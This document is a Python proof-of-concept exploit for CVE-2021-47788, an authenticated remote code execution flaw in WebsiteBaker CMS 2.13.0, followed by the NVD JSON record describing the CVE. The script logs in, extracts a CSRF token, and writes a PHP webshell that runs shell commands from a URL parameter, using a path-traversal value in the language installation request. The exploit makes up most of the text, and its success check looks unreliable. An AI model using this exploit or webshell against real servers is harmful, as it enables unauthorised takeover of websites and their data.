CVE-2021-47788

# CVE-2021-47788 PoC - WebsiteBaker Authenticated RCE via Language Installation # Target: WebsiteBaker CMS <= 2.13.0 # Requirement: Valid account with language editing permissions import requests import re from urllib.parse import urlencode TARGET_URL = "http://target-website.com/websitebaker" USERNAME = "attacker" PASSWORD = "password123" session = requests.Session() def login(): """Authenticate to WebsiteBaker with valid credentials""" login_url = f"{TARGET_URL}/admin/login/index.php" login_data = { 'username_fieldname': USERNAME, 'password_fieldname': PASSWORD, 'username': USERNAME, 'password': PASSWORD } response = session.post(login_url, data=login_data) return 'wb_user_id' in session.cookies def get_csrf_token(): """Extract CSRF token from language settings page""" lang_url = f"{TARGET_URL}/admin/languages/index.php" response = session.get(lang_url) match = re.search(r'name="[\w]+token[\w]*"[\s]+value="([a-f0-9]+)"', response.text) return match.group(1) if match else None def exploit(csrf_token): """Execute RCE by injecting PHP code via language installation""" # PHP webshell payload webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" exploit_url = f"{TARGET_URL}/admin/languages/save.php" exploit_data = { 'type': 'install', 'action': 'save', 'security_token': csrf_token, # Exploit: Inject PHP code into language file path 'name': 'rce_lang', 'code': webshell, # Write to web-accessible directory 'path': '../../../modules/rce.php' } response = session.post(exploit_url, data=exploit_data) return f"{TARGET_URL}/modules/rce.php?cmd=whoami" in str(response.content) def main(): print("[*] Starting CVE-2021-47788 exploitation...") if not login(): print("[-] Authentication failed") return print("[+] Login successful") token = get_csrf_token() if not token: print("[-] Failed to obtain CSRF token") return print(f"[+] CSRF token obtained: {token}") if exploit(token): print("[+] RCE payload deployed successfully!") print(f"[+] Webshell accessible at: {TARGET_URL}/modules/rce.php") else: print("[-] Exploitation failed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47788", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:22.263", "lastModified": "2026-01-30T01:02:28.600", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebsiteBaker 2.13.0 contains an authenticated remote code execution vulnerability that allows users with language editing permissions to execute arbitrary code. Attackers can exploit the language installation endpoint by manipulating language installation parameters to achieve remote code execution on the server."}, {"lang": "es", "value": "WebsiteBaker 2.13.0 contiene una vulnerabilidad de ejecución remota de código autenticada que permite a usuarios con permisos de edición de idioma ejecutar código arbitrario. Los atacantes pueden explotar el endpoint de instalación de idioma manipulando los parámetros de instalación de idioma para lograr la ejecución remota de código en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:websitebaker:websitebaker:2.13.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5920127-998B-4E06-915A-7C4C739A4BF8"}]}]}], "references": [{"url": "https://websitebaker.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50310", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/websitebaker-remote-code-execution-rce-authenticated", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50310", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "VDB Entry"]}]}}